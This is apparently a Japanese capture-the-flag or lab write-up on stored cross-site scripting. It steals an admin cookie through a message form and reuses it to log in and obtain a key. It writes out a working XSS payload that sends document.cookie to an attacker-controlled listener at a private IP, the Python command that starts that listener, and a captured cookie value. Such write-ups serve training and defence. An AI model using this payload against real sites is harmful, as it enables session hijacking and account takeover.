Xss コンテンツの主な焦点は、管理者のクッキーを取得し、その後、偽の管理者のクッキーを使用してログインすることです。
以下はインターフェースです

上記の画像の Test をクリックしてメッセージを残すことができます

クッキーを取得するための XSS ペイロードを準備します
<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>
Web サーバーを起動し、クッキーを受け取ります
Python -m SimpleHTTPServer 8889
![]()
ペイロードを入力ボックスに書き込みます

クエリを送信するために送信ボタンをクリックします
待つ
Python がクッキーを受け取ったかどうかを確認します
![]()
クッキーをコピーします
1acb0fb952b3caaf1ab7277511923138

クッキーの値を置き換えます

置換するために Edit をクリックします

ページをリフレッシュし、Admin をクリックします

ログインに成功し、キーを取得します
